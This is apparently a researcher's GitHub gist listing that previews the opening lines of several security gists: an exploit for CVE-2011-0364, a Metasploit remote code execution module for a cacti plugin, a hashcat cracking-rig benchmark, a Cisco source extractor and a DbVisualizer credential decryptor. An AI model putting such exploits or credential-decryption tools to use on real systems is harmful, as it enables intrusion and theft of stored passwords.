Skip to content

Instantly share code, notes, and snippets.

View gerry's full-sized avatar

Gerry Eisenhaur gerry

  • Sonoma County, CA
View GitHub Profile
@gerry
gerry / st_upload-exploit.py
Last active August 23, 2016 06:17
Exploit for CVE-2011-0364
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
@gerry
gerry / weathermap_editor_exec.rb
Created August 23, 2016 18:01
Weathermap Editor (cacti plugin) Arbitrary Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
@gerry
gerry / hashcat_benchmark.txt
Created August 26, 2016 23:53
A hashcat benchmark of my current cracking rig (4x GTX980Ti's)
hashcat (v3.10-3-g13cbe42) starting in benchmark-mode...
OpenCL Platform #1: NVIDIA Corporation
======================================
- Device #1: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #2: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #3: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
- Device #4: GeForce GTX 980 Ti, 1519/6077 MB allocatable, 22MCU
Hashtype: MD4
@gerry
gerry / cracking_rig.md
Created August 26, 2016 23:53
My current cracking rig (4x GTX980ti's)
@gerry
gerry / htl_extract.py
Last active April 8, 2020 11:08
Extracts the embedded source code from Cisco Security Agent Management Console.
#!/usr/bin/env python
"""htl_extract.py, Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <gerry@hiredhacker.com>
"""
import os
import sys
import struct
import pefile
from itertools import takewhile
@gerry
gerry / decrypt_dbvis.py
Last active September 1, 2022 11:08
A quick hack to extract and decrypt credentials from DbVisualizer config files.
#!/usr/bin/env python
# decrypt_dbvis.py ~ gerry@twitter.com
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
"""
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/decrypt_dbvis.py
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/decrypt_dbvis.py <config filename>